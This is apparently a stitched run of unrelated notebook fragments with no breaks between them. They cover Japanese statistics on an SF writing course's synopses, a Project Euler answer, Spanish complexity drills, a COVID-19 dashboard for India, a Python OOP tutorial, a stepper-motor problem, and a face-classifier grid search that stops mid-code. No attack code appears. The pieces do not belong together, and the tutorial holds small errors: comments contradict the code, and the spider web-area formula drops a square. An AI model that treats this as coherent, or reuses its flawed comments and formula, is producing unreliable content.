とはいえ、選出梗概の方が文字数が多いのではないか、という感覚が間違いではなさそうだ。本文文字数の25パーセンタイルを見ると、1197字(選出梗概で1198字)となっており、約1/4の作品しか本文の文字数制約を守っていないことがわかる。また、アピール文に関しては75パーセンタイルが400字ということで、約3/4がルールを守っている。 本文とアピール文の文字数の分布はそれぞれ次のようになる。bins = list(range(0, character_counts_with_selected.character_count.max() + 300, 300)) character_counts_with_selected[['character_count', 'selected_character_count']].plot.hist(bins=bins) bins = list(range(0, int(character_counts_with_selected.appeal_character_count.max()) + 100, 100)) character_counts_with_selected[['appeal_character_count', 'selected_appeal_character_count']].plot.hist(bins=bins)文字数順の選出梗概 選出梗概はそもそも33編しかないので、一覧しても大した量ではない。 
せっかくなので、本文文字数の少ない順に並べておく。selected_synopses_character_counts.sort_values(by='character_count')課題ごとの梗概文字数 次に、課題ごとの梗概文字数の分布を見ておこう。 もしかすると、1200字のルールを守ったものしか選出しないゲスト講師がいるかも知れない。sns.scatterplot(x='number', y='character_count', hue='selected', data=synopses_character_counts)横軸が課題の番号、縦軸が文字数で、ひとつひとつの作品がドットでプロットされている。 選出された梗概はドットがオレンジ色になっている。ただ、これではドットの重なりが多くわかりにくいので、重なった部分を横に広げたのが下の図である。sns.swarmplot(x='number', y='character_count', hue='selected', data=synopses_character_counts)すべての選出作が1200字を下回ったのは第1回だけだった。 受講生勝手にランキング ここからは趣向を変えて、3期のようすを知っている人向けのデータを紹介する。 SF創作講座では得点が絶対唯一の指標であるが、ここではそれ以外の数値について受講生を勝手にランキングしていこうと思う。 梗概 まずは、梗概に関するランキングである。 データとして以下の表を用いる。student_synopses梗概提出皆勤賞 全10回すべての梗概を提出した13名は次のとおりである。student_synopses[student_synopses.submitted_count == 10][['name', 'submitted_count']]文字数遵守 10回すべての梗概を提出しながらも、梗概とアピール文の文字数制限をすべて守った受講生が、なんと一人だけいた。 揚羽はなさんである。ちなみに梗概を4回以上提出した人に範囲を広げてもただ1人である。student_synopses \ [(student_synopses.max_character_count <= 1200) & (student_synopses.submitted_count >= 4)] \ [['name', 'submitted_count', 'max_character_count']] \ .sort_values(by='max_character_count').head()5回以上の提出で平均文字数1200字以下 毎回守ったわけではないが、過半数の課題を提出したうえで、それらの文字数を平均すると1200字以下になる受講生は次のとおりである。student_synopses \ [(student_synopses.characters_ave <= 1200) & (student_synopses.submitted_count >= 5)] \ [['name', 'submitted_count', 'characters_ave']] \ .sort_values(by='characters_ave')文字数超過ワースト5 逆に、文字数制限を一切守る気のない、平均文字数のもっとも大きい人たちは次のとおりである。student_synopses[student_synopses.submitted_count >= 2][['name', 'submitted_count', 'characters_ave']] \ .sort_values(by='characters_ave', ascending=False).head()梗概選出回数 3回以上梗概を選出されたのは5人、うち4回選出されたのは斧田 小夜さん1人だった。student_synopses[student_synopses.selected_count >= 3][['name', 'selected_count']] \ .sort_values(by='selected_count', ascending=False)梗概選出率 しかし、梗概選出回数を提出回数で割った「梗概選出率」でみると、1位は私になる。 「受講生勝手にランキング」などと言いながら、これがやりたかっただけである。 ちなみに、選出実作1編あたりの得点でランキングをつくった場合は、私がワースト1位になってしまう。selected_rate = (student_synopses.selected_count / student_synopses.submitted_count).fillna(0) selected_rate.name = 'selected_rate' pd.concat([student_synopses, selected_rate], axis=1)\ [['name', 'submitted_count', 'selected_count', 'selected_rate']] \ .sort_values(by='selected_rate', ascending=False).head()実作 つぎは、実作に関するランキングをみていこう。 データとして用いるのは以下の表である。student_works実作提出回数 実作提出回数トップ5は次のとおりである。 斧田さんは実作も皆勤賞だった。student_works[student_works.submitted_count >= 7][['name', 'submitted_count']] \ .sort_values(by='submitted_count', ascending=False)自主提出得点 点数の入りにくい自主提出の得点だけでランキングすると、トップ5は次のようになる。 ここでも斧田さんが1位。student_works[student_works.optional_score >= 3][['name', 'optional_score']] \ .sort_values(by='optional_score', ascending=False)実作総文字数 最後に、実作の総文字数トップ5である。 当然斧田さんが1位。だんとつの20万字である。student_works[['name', 'characters_sum']].sort_values(by='characters_sum', ascending=False).head()Project Euler: Problem 9 https://projecteuler.net/problem=9A Pythagorean triplet is a set of three natural numbers, $a < b < c$, for which,$$a^2 + b^2 = c^2$$For example, $3^2 + 4^2 = 9 + 16 = 25 = 5^2$.There exists exactly one Pythagorean triplet for which $a + b + c = 1000$. 
Find the product abc.def Euler_9(n): for i in range(1,n,1): for j in range(1,n-i,1): k = n-i-j if i**2+j**2==k**2: return i*j*k return 0 def Euler_9(n): for i in range(1,n,1): for j in range(1,n-i,1): k = n-i-j if i**2+j**2==k**2: return i*j*k return 0 x = Euler_9(1000) print(x) """Answer prints itself below""" # This cell will be used for grading, leave it at the end of the notebook.def ejemplo11( n ): count = 0 i = n while i > 1 : count += 1 i = i // 2 return count print(ejemplo11(16)) # T(n) = 2 + (2 Log 2 n) def ejemplo13( x ): bandera = x contador = 0 while( bandera >= 10): print(f" x = { bandera } ") bandera /= 10 contador = contador + 1 print(contador) # T(x) = log10 x +1 ejemplo13( 1000 ) def ejemplo14( n ): y = n z = n contador = 0 while y >= 3: #3 y /= 3 # 1 contador += 1 # cont =3 while z >= 3: #27 z /= 3 contador += 1 return contador print(ejemplo14( 27 )) def ejemplo15( n ): contador = 0 for i in range( n ) : for j in range( n ) : contador += 1 while n > 1 : contador += 1 n /= 2 return contador print(ejemplo15(10))"Dynamic Covid-19 Tracker"- badges: false- author: Hello!, This is a dynamic version of the dashboard, it updates once daily! Data source is https://www.covid19india.org/#collapse from datetime import datetime import pandas as pd import numpy as np import requests import json import matplotlib.pyplot as plt import matplotlib.dates as mdates import matplotlib as mpl from IPython.core.display import display,HTML import pytz %matplotlib inline dynamic_df = pd.read_csv("https://api.covid19india.org/csv/latest/state_wise_daily.csv") dynamic_df.head() ddf = dynamic_df[(dynamic_df.Status == "Confirmed")] ddf ddf1 = ddf.drop(columns = ["Status"]) ddf2 = dynamic_df[(dynamic_df.Status == "Deceased")] ddf2 = ddf2.drop(columns = ["Status"]) ddf1["Date"] = ddf1["Date"].astype('datetime64[ns]') update = dynamic_df.iloc[-1,0] cases = ddf1.TT.sum() new = ddf1.iloc[-1,1] deaths = ddf2.TT.sum() dnew = ddf2.iloc[-1,1] overview = '''

India

Last update: {update}

Confirmed cases:

{cases} (+{new})

Confirmed deaths:

{deaths} (+{dnew})

''' html = HTML(overview.format(update=update, cases=cases,new=new,deaths=deaths,dnew=dnew)) display(html) #hide_input tz = pytz.timezone('Asia/Kolkata') #now = datetime.now().time() # time object now = datetime.now() now = now.astimezone(tz) print("This dashboard is last updated at (IST) =", now.strftime("%Y-%m-%d %H:%M")) #collapse ch_total = ddf1.CH.sum() ch_new = ddf1.iloc[-1,7] mh_total = ddf1.MH.sum() mh_new = ddf1.iloc[-1,23] dl_total = ddf1.DL.sum() dl_new = ddf1.iloc[-1,11] firstdata = '''

--Important Places--

Total Cases (New Cases)

Chandigarh (Hometown): {ch_total} (+{ch_new})

Delhi (Second Home): {dl_total} (+{dl_new})

Maharashtra (Just Because..): {mh_total} (+{mh_new})

''' html = HTML(firstdata.format(ch_total=ch_total, ch_new = ch_new, mh_total = mh_total, mh_new = mh_new, dl_total = dl_total, dl_new = dl_new )) display(html) #collapse n = 10 st = ["TT", "MH", "TN", "DL", "KA", "UP", "BR", "WB", "TG", "CH"] st_name = ["Daily Count for India", "Maharashta", "Tamil Nadu", "Delhi", "Karnataka", "Uttar Pradesh", "Bihar", "West Bengal", "Telangana", "Chandigarh (My hometown)"] ax = [] fig = plt.figure(figsize = (16,30)) gs = fig.add_gridspec(n, 3) for i in range(n): ax1 = fig.add_subplot(gs[i, :]) ax1.bar(ddf1.Date,ddf1[st[i]],alpha=0.3,color='#007acc') ax1.plot(ddf1.Date,ddf1[st[i]] , marker="o", color='#007acc') ax1.xaxis.set_major_locator(mdates.WeekdayLocator()) ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b %d')) ax1.text(0.02, 0.5,st_name[i], transform = ax1.transAxes, fontsize=25) ax1.spines['right'].set_visible(False) ax1.spines['top'].set_visible(False)Object-Oriented Programming Introduction After you have been coding for a little bit of time, you may come across some people talking about **object-oriented programming** or **OOP** for short. This could be accompanied by scary words like "inheritance", "overloading", and "children" too. But never fear, for not only is OOP a useful coding paradigm, but it is also incredibly easy to implement in python.For this session I am assuming that you are working in Python 3, however I don't believe many of the basics have changed since Python 2, nonetheless it's worthwhile learning the version that isn't over 20 years old... What is OOP? Put simply, object-oriented programming is a way of thinking about programming outside of the classic "run this function on this variable" style. Instead we can think of the data we are considering as an **object**.This object could have properties and things that the object can do. In python we refer to an object as a `class`, with the properties called `attributes` and the things it can do referred to as `methods`.You can think of a `class` as a template for an object, so if you consider the thing you are sitting on, it is a chair. More specifically it is *that particular chair you are sitting on*. In that vein, you are sitting on an *instance* of class `chair`.Other people will have different instances of class `chair`, and each instance is unique, with its own property values. If you cut the leg off your chair, it does not remove a leg from everybody else's chair, just decreses the leg count of your chair by 1.If that all sounds a bit abstract, don't worry. It is. But the vocabulary above will be used throughout and should help you grasp the concepts as we go. Our first `class` Let's build our first class. First open a new file called `OOP.py`.To make a class in python we use the `class` keyword.To define a method of a class, you simply make a function within the class definition, but it does need a special argument called `self`. We will come to why that is in a little bit.To define attributes of a class we assign values to `self.x` for any given attribute `x`.Defining a class is not good enough on its own though. We also need to define a method of the class called `__init__()`. This method is run when you create an instance of a class, and generates the properties of the *instance*.Here is the skeleton for creating our first class, the class for a square:class square: # Create class "test" def __init__(self): # Define init method self.side_length = 2 # Set side_length to the value 1Now we have created our class, we can make an instance of the class `test`. 
Let's call that `instance1`.square1 = square()So now we have the instance assigned to the name `instance1`, we can check that attribute `property1` by writing `instance.property`.square1.side_lengthWe can manipulate this attribute directly if we want like a normal variable.square1.side_length = 4 square1.side_lengthIn fact it is like a normal variable in every way except that it is encapsulated in this class.Notice how we cannot access attributes which are not there...square1.areaHowever we can assign into attributes that were not made when the instance was first defined.square1.area = square1.side_length ** 2 square1.areaRectangles and arguments Now let's define a slightly more complicated class for a rectangle. This rectangle can be of arbitrary dimensions `x`, `y`. These dimensions will be specified when creating an instance of the object (also known as *instantiating* the object).To handle this, we need to add a few arguments to the `__init__()` method.class rectangle: def __init__(self, x, y): # x and y are arguments of the init method self.x = x self.y = yNow let's create a 4x3 rectangle:rectangle1 = rectangle(4,3) rectangle1.x rectangle1.yNow to find the area, we can just calculate it outside the instance, and assign it to a new attribute as follows:rectangle1.area = rectangle1.x * rectangle1.y rectangle1.areaBut this is an operation we might want to do to each rectangle. So what do we do when something is repeatedly needed? We turn it into a function. Specifically here we are going to make a `method` of the object.A `method` is special in that it takes the argument `self` as its first argument. This value `self` refers to the instance that the method belongs to.So let's define a method to calculate the area of an object of class rectangle:class rectangle: def __init__(self, x, y): self.x = x self.y = y self.area = 0 # It is usually safest to create the attribute first with a dummy value. def calc_area(self): self.area = self.x * self.ySo now we can instantiate the new rectangle as before, and then use the method to calculate the area automatically by calling `rectangle.calc_area()`. The brackets here are important as remember `calc_area()` is basically just a *function*.rectangle2 = rectangle(4,3) rectangle2.areaOops, we forgot to run `calc_area()`, so the area value is just the default we set. Let's change that.rectangle2.calc_area() rectangle2.areaPerfect. But that was annoying. We know what the area will be once we instantiate the rectangle with values for the sides, so is there some way to save some time?As a little trick, we can call other methods in the `__init__()` method to make them run as soon as we instantiate the object, like so:class rectangle: def __init__(self, x, y): self.x = x self.y = y self.calc_area() # Run the method calc_area() of the object immediately def calc_area(self): self.area = self.x * self.y rectangle3 = rectangle(4,3) rectangle3.areaChallenge 1Make a class `circle` that takes the radius of a circle as an argument at instantiation, and calculates its area and circumference automatically. A more useful example To understand OOP, it is useful to have a more concrete example to work with, so let us think about chairs.Here's a chair class:class chair: def __init__(self, legs, height, colour): self.legs = legs self.height = height self.colour = colour def paint(self, newcolour): # A new method! 
Notice how it can take extra arguments aside from self self.colour = newcolour`chair1` is a very typical chair with 4 legs, is 0.8m tall, and is coloured green.chair1 = chair(4, 0.8, "green") chair1.legs chair1.height chair1.colourNow let's use the `paint()` method of the chair class to repaint the chair a different colourchair1.paint("purple") chair1.colourChallenge 2Modify the chair class to make the height adjustable by certain amounts using the `raise()` and `lower()` methods.**NOTE: There are some heights that are not reasonable, it might be best to check that the height is within reasonable bounds** Passing around objects An object can be passed around just like any other data. You can pack it into lists, put it in dictionaries, even pass it into functions.Let's create a function that works on chair objects.def saw_leg(c): if c.legs > 0: # A chair cannot have fewer than 0 legs c.legs = c.legs - 1 print(chair1.legs) saw_leg(chair1) print(chair1.legs)2 1Notice how even though we didn't return the chair object at the end of the function, it *still* affected the chair object.**This is something to be very careful of!**An object name in python is essentially just a pointer to where the object is in memory. If you do things to that pointer in a function, it can affect the object directly!In general it is good practice when working with functions that manipulate objects to return the object at the end. This means the function behaves as expected, which is what we should always be striving for when programming: predictibility.def saw_leg(c): if c.legs > 0: c.legs = c.legs - 1 return c chair1 = saw_leg(chair1) chair1.legsAs stated above we could make a list of chairs too.import random chair_stack = [] for x in range(10): # Make 10 green chairs with random numbers of legs and random heights chair_stack.append(chair(random.randint(1, 10), random.random()*2, "green")) for c in chair_stack: print(c.legs)5 8 10 8 9 10 8 2 1 4We can manipulate this as we would a list of any other thing. Here's a list comprehension that saws a leg off each chair if we can.chair_stack = [saw_leg(c) for c in chair_stack] for c in chair_stack: print(c.legs)4 7 9 7 8 9 7 1 0 3OOP in biology In biology, our data are often comprised of samples of individuals. 
If we know the attributes of the individuals that we are measuring, we can write a class that will handle each individual as a separate instance.from math import pi class spider: def __init__(self, body_weight, web_diameter_horizontal, web_diameter_vertical, hub_diameter, mesh_width): self.bw = body_weight self.dh = web_diameter_horizontal self.dv = web_diameter_vertical self.h = hub_diameter self.mw = mesh_width self.calc_ca() def calc_ca(self): # Calculate capture area using Ellipse-Hub formula self.ca = ((self.dv/2)*(self.dh/2)*pi) - ((self.h/2)*pi) spidey1 = spider(1, 10, 8, 3, 1.4) print(spidey1.ca)58.119464091411174Exercises Electric Machinery Fundamentals Chapter 9 Problem 9-8%pylab inlinePopulating the interactive namespace from numpy and matplotlibDescription For a particular application, a three-phase stepper motor must be capable of stepping in 10° increments.How many poles must it have?theta_e = 60/180*pi # [rad] theta_m = 10/180*pi # [rad]SOLUTION From Equation (9-18), the relationship between mechanical angle and electrical angle in a three-phase stepper motor is:$$\theta_m = \frac{2}{p}\theta_e$$p = 2* theta_e/theta_m print(''' p = {:.0f} poles ============'''.format(p))p = 12 poles ============Part I Projectimport numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import pandas as pd from sklearn.datasets import fetch_olivetti_faces %matplotlib inlineFetch, Preview, and Explore the DataX, y = fetch_olivetti_faces(return_X_y=True) def inspect_data(X, y, show_data=False): print("Data X shape: ", X.shape) print("Labels y shape: ", y.shape) if show_data: print("Dataset X:\n", X) print("Labels y: \n", y) def preview_faces(X, num_of_images_divided_by_2): plt.figure(figsize=(15, 10)) counter = 0 shuffled_idx = np.random.permutation(len(X)) X_copy = X.copy() for index, X_image in enumerate(X_copy[shuffled_idx]): plt.subplot(num_of_images_divided_by_2 // 10, 5, index + 1) plt.imshow(X_image.reshape(64, 64), cmap="gray") plt.axis('off') if (counter == num_of_images_divided_by_2/2 - 1): break counter += 1 plt.show() preview_faces(X, 50)Data Preprocessing# Methods: # most promising: Dimensionality Reduction/Feature Removals # things to test out: # PCA/IPCA/kPCA/MDS/Isomap/LDA/t-SNE/LLE/Random Proj. 
# KMeans, DBSCAN, Agglomerative, Spectral, Mean-shift, affinity prop, BIRCH # Classifiers: # Softmax/SGD/SVC/LinearSVC/DT/Ensemble/KNeighbors from sklearn.model_selection import train_test_split, StratifiedShuffleSplit from sklearn.model_selection import GridSearchCV, RandomizedSearchCV from sklearn.model_selection import cross_val_score, cross_val_predict, learning_curve, validation_curve from sklearn.pipeline import Pipeline from sklearn.metrics import f1_score, accuracy_score, precision_score, recall_score, roc_auc_score, precision_recall_curve, roc_curve from sklearn.decomposition import PCA, IncrementalPCA, KernelPCA from sklearn.manifold import TSNE, LocallyLinearEmbedding, MDS, Isomap from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.random_projection import GaussianRandomProjection, SparseRandomProjection from sklearn.cluster import KMeans, DBSCAN, AffinityPropagation, AgglomerativeClustering, Birch, MeanShift, SpectralClustering from sklearn.mixture import GaussianMixture, BayesianGaussianMixture from sklearn.linear_model import LogisticRegression, SGDClassifier from sklearn.svm import LinearSVC, SVC from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, ExtraTreesClassifier, AdaBoostClassifier, VotingClassifier, StackingClassifier, BaggingClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.neural_network import MLPClassifier from xgboost import XGBClassifier inspect_data(X, y, True) # splitting the data olivetti = fetch_olivetti_faces() strat_split = StratifiedShuffleSplit(n_splits=1, test_size=40, random_state=42) train_valid_idx, test_idx = next(strat_split.split(olivetti.data, olivetti.target)) X_train_valid = olivetti.data[train_valid_idx] y_train_valid = olivetti.target[train_valid_idx] X_test = olivetti.data[test_idx] y_test = olivetti.target[test_idx] strat_split = StratifiedShuffleSplit(n_splits=1, test_size=80, random_state=43) train_idx, valid_idx = next(strat_split.split(X_train_valid, y_train_valid)) X_train = X_train_valid[train_idx] y_train = y_train_valid[train_idx] X_valid = X_train_valid[valid_idx] y_valid = y_train_valid[valid_idx] inspect_data(X_train, y_train) inspect_data(X_valid, y_valid) inspect_data(X_test, y_test) log_reg = LogisticRegression() sgd_clf = SGDClassifier() lin_svc = LinearSVC() svc = SVC() tree_clf = DecisionTreeClassifier() rnd_forest_clf = RandomForestClassifier() extra_trees_clf = ExtraTreesClassifier() adaboost_clf = AdaBoostClassifier() # gradientboost_clf = GradientBoostingClassifier() bagging_clf = BaggingClassifier() neighbors_clf = KNeighborsClassifier() mlp_clf = MLPClassifier() classifiers = (log_reg, sgd_clf, lin_svc, svc, tree_clf, rnd_forest_clf, extra_trees_clf, adaboost_clf, # gradientboost_clf, bagging_clf, neighbors_clf, mlp_clf) xgboost_clf = XGBClassifier() # voting_clf = VotingClassifier() # stacking_clf = StackingClassifier() shortlist_models = False if shortlist_models: accuracy = [] for classifier in classifiers: classifier_accuracy = cross_val_score(classifier, X_train, y_train, scoring="accuracy", cv=5, n_jobs=-1, verbose=2) print(str(classifier)) accuracy.append((str(classifier), classifier_accuracy)) # accuracy # mean_median_scores = [] # for classifier, scores in accuracy: # mean_median_scores.append((str(classifier), np.mean(scores), np.median(scores))) # mean_median_scores # LogisticRegression # LinearSVC # RandomForestClassifier # ExtraTreesClassifier # LogisticRegression # 1st 
searchCV run_GridSearchCV1_log_reg = False if run_GridSearchCV1_log_reg: param_grid_log_reg = [{"penalty": ["l1", "l2", "elasticnet", None], "tol": [1e-0, 1e-1, 1e-2, 1e-3, 1e-4], "C": [1.0, 10.0, 100.0], "l1_ratio": np.round(np.linspace(0, 1, 10), 1)} ] grid_cv_log_reg = GridSearchCV(log_reg, param_grid_log_reg, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg.fit(X_train, y_train) # grid_cv.best_params_ best_params_log_reg1 = {'C': 10.0, 'l1_ratio': 0.0, 'penalty': 'l2', 'tol': 0.01} # 2nd searchCV run_GridSearchCV2_log_reg = False if run_GridSearchCV2_log_reg: param_grid_log_reg = [{"tol": np.linspace(0.01, 0.1, 10), "C": [10.0, 32, 55.0]} ] grid_cv_log_reg = GridSearchCV(LogisticRegression(**best_params_log_reg1), param_grid_log_reg, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg.fit(X_train, y_train) # grid_cv_log_reg.best_params_ best_params_log_reg2 = {'C': 10.0, 'penalty': 'l2', 'tol': 0.01} log_reg_optimized = LogisticRegression(**best_params_log_reg2) log_reg_optimized.fit(X_train, y_train) log_reg_pred = log_reg_optimized.predict(X_valid) print(accuracy_score(y_valid, log_reg_pred)) # 96.25% # LinearSVC # 1st searchCV run_GridSearchCV1_lin_svc = False if run_GridSearchCV1_lin_svc: param_grid_lin_svc = [{"penalty": ["l1", "l2"], "loss": ["hinge", "squared_hinge"], "tol": [1e-0, 1e-1, 1e-2, 1e-3, 1e-4], "C": [1.0, 10.0, 100.0]} ] grid_cv_lin_svc = GridSearchCV(lin_svc, param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc1 = {'C': 10.0, 'loss': 'squared_hinge', 'penalty': 'l2', 'tol': 0.001} # 2nd searchCV run_GridSearchCV2_lin_svc = False if run_GridSearchCV2_lin_svc: param_grid_lin_svc = [{"tol": np.linspace(0.001, 0.01, 10), "C": [10.0, 32, 55.0]} ] grid_cv_lin_svc = GridSearchCV(LinearSVC(**best_params_lin_svc1), param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc2 = {'C': 10.0, 'tol': 0.004, 'loss': 'squared_hinge', 'penalty': 'l2'} # 3rd searchCV run_GridSearchCV3_lin_svc = False if run_GridSearchCV3_lin_svc: param_grid_lin_svc = [{"tol": np.linspace(0.004, 0.005, 11)}] grid_cv_lin_svc = GridSearchCV(LinearSVC(**best_params_lin_svc2), param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc3 = {'C': 10.0, 'tol': 0.004, 'loss': 'squared_hinge', 'penalty': 'l2'} lin_svc_optimized = LinearSVC(**best_params_lin_svc3) lin_svc_optimized.fit(X_train, y_train) lin_svc_pred = lin_svc_optimized.predict(X_valid) print(accuracy_score(y_valid, lin_svc_pred)) # 97.50% # RandomForestClassifier # 1st searchCV run_GridSearchCV1_rnd_clf = False if run_GridSearchCV1_rnd_clf: param_grid_rnd_clf = [{"n_estimators": [50, 100, 150, 200, 250, 300], "criterion": ["gini", "entropy"], "max_depth": [10, 100, 1000, None], "min_samples_split": [2, 4, 6, 8, 10]} ] grid_cv_rnd_clf = GridSearchCV(rnd_forest_clf, param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf1 = {'criterion': 'gini', 'max_depth': None, 'min_samples_split': 4, 'n_estimators': 300} # 2nd searchCV run_GridSearchCV2_rnd_clf = False if run_GridSearchCV2_rnd_clf: param_grid_rnd_clf = [{"n_estimators": [300, 400, 500, 600, 700, 800], "min_samples_split": [2, 3, 4, 5, 6], "min_samples_leaf": [1, 5, 10, 20, 
30, 50], # "max_features": ["auto", "sqrt", "log2", None], # "max_leaf_nodes": [10, 20, 50, None], # "bootstrap": [True, False], # "max_samples": [None, *np.linspace(0, 1, 11)[1:10]] } ] grid_cv_rnd_clf = GridSearchCV(RandomForestClassifier(**best_params_rnd_clf1), param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf2 = {'min_samples_leaf': 1, 'min_samples_split': 4, 'n_estimators': 600, 'criterion': 'gini', 'max_depth': None} # 3rd searchCV run_GridSearchCV3_rnd_clf = False if run_GridSearchCV3_rnd_clf: param_grid_rnd_clf = [{ "max_features": ["auto", "sqrt", "log2", None], "max_leaf_nodes": [10, 20, 50, None], "bootstrap": [True, False], # "max_samples": [None, *np.round(np.linspace(0, 1, 11)[1:10], 3)] } ] grid_cv_rnd_clf = GridSearchCV(RandomForestClassifier(**best_params_rnd_clf2), param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf3 = {'bootstrap': True, 'max_features': 'auto', 'max_leaf_nodes': 50, 'min_samples_leaf': 1, 'min_samples_split': 4, 'n_estimators': 600, 'criterion': 'gini', 'max_depth': None} rnd_clf_optimized = RandomForestClassifier(**best_params_rnd_clf3) rnd_clf_optimized.fit(X_train, y_train) rnd_clf_optimized_pred = rnd_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, rnd_clf_optimized_pred)) # ExtraTreesClassifier # 1st searchCV run_GridSearchCV1_extra_trees_clf = False if run_GridSearchCV1_extra_trees_clf: param_grid_extra_trees_clf = [{"n_estimators": [50, 100, 150, 200, 250, 300], "criterion": ["gini", "entropy"], "max_depth": [10, 100, 1000, None], # "min_samples_split": [2, 4, 6, 8, 10] } ] grid_cv_extra_trees_clf = GridSearchCV(extra_trees_clf, param_grid_extra_trees_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_extra_trees_clf.fit(X_train, y_train) # grid_cv_extra_trees_clf.best_params_ best_params_extra_trees_clf1 = {'criterion': 'gini', 'max_depth': 100, 'n_estimators': 300} # 2nd searchCV run_GridSearchCV2_extra_trees_clf = False if run_GridSearchCV2_extra_trees_clf: param_grid_extra_trees_clf = [{"n_estimators": [275, 300, 325, 350, 375, 400], "min_samples_split": [2, 4, 6, 8, 10] } ] grid_cv_extra_trees_clf = GridSearchCV(ExtraTreesClassifier(**best_params_extra_trees_clf1), param_grid_extra_trees_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_extra_trees_clf.fit(X_train, y_train) # grid_cv_extra_trees_clf.best_params_ best_params_extra_trees_clf2 = {'min_samples_split': 6, 'n_estimators': 300, 'criterion': 'gini', 'max_depth': 100, } extra_trees_clf_optimized = ExtraTreesClassifier(**best_params_extra_trees_clf2) extra_trees_clf_optimized.fit(X_train, y_train) extra_trees_clf_optimized_pred = extra_trees_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, extra_trees_clf_optimized_pred)) extra_trees_clf_optimized = ExtraTreesClassifier(max_depth=100, min_samples_split= 6, n_estimators= 300) extra_trees_clf_optimized.fit(X_train, y_train) extra_trees_clf_optimized_pred = extra_trees_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, extra_trees_clf_optimized_pred)) feature_importances = pd.Series(grid_cv_extra_trees_clf.best_estimator_.feature_importances_) feature_importances.nlargest(500) # Testing XGBClassifier xgb_classifier = XGBClassifier() xgb_accuracy = cross_val_score(xgb_classifier, X_train, y_train, scoring="accuracy", cv=5, n_jobs=-1, verbose=2) 
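# cross_val_score returns one accuracy per fold (cv=5, so an array of 5 values); it is displayed below.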
xgb_accuracy[Parallel(n_jobs=-1)]: Using backend LokyBackend with 8 concurrent workers. [Parallel(n_jobs=-1)]: Done 2 out of 5 | elapsed: 46.0s remaining: 1.2min [Parallel(n_jobs=-1)]: Done 5 out of 5 | elapsed: 46.3s remaining: 0.0s [Parallel(n_jobs=-1)]: Done 5 out of 5 | elapsed: 46.3s finished+ **testing dataset size**# Experimenting with Dataset Size X_train_exp, X_test_exp, y_train_exp, y_test_exp = train_test_split(X, y, random_state=12, test_size=0.2) lin_svc_optimized_exp = LinearSVC(**best_params_lin_svc3) lin_svc_optimized_exp.fit(X_train_exp, y_train_exp) lin_svc_optimized_exp_pred = lin_svc_optimized_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, lin_svc_optimized_exp_pred)) extra_trees_clf_exp = ExtraTreesClassifier(**best_params_extra_trees_clf2) extra_trees_clf_exp.fit(X_train_exp, y_train_exp) extra_trees_clf_exp_pred = extra_trees_clf_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, extra_trees_clf_exp_pred)) extra_trees_clf_exp = ExtraTreesClassifier(**best_params_rnd_clf3) extra_trees_clf_exp.fit(X_train_exp, y_train_exp) extra_trees_clf_exp_pred = extra_trees_clf_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, extra_trees_clf_exp_pred)) log_reg_exp = LogisticRegression(**best_params_log_reg2) log_reg_exp.fit(X_train_exp, y_train_exp) log_reg_exp_pred = log_reg_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, log_reg_exp_pred)) random_forest_exp = RandomForestClassifier(**best_params_rnd_clf3) random_forest_exp.fit(X_train_exp, y_train_exp) random_forest_exp_pred = random_forest_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, random_forest_exp_pred)) random_forest_exp = RandomForestClassifier(**best_params_extra_trees_clf2) random_forest_exp.fit(X_train_exp, y_train_exp) random_forest_exp_pred = random_forest_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, random_forest_exp_pred))0.9375+ **Using DR (Clustering)** KMeans, ~~DBSCAN~~, ~~AffinityPropagation~~, ~~AgglomerativeClustering~~, Birch, ~~MeanShift~~, ~~SpectralClustering~~~~GaussianMixture~~, ~~BayesianGaussianMixture~~def DR_pipeline(model, DR_algorithm): return Pipeline([ ("DR_algo", DR_algorithm), ("model", model) ]) def DR_pipeline_accuracy_calculator(pipeline, features=X_train, labels=y_train): pipeline.fit(features, labels) pipeline_predictions = pipeline.predict(X_valid) return accuracy_score(y_valid, pipeline_predictions) # log reg log_reg_KMeans_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), KMeans()) print(DR_pipeline_accuracy_calculator(log_reg_KMeans_pipeline)) log_reg_BIRCH_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), Birch()) print(DR_pipeline_accuracy_calculator(log_reg_BIRCH_pipeline)) # lin svc lin_svc_KMeans_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), KMeans()) print(DR_pipeline_accuracy_calculator(lin_svc_KMeans_pipeline)) lin_svc_BIRCH_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), Birch()) 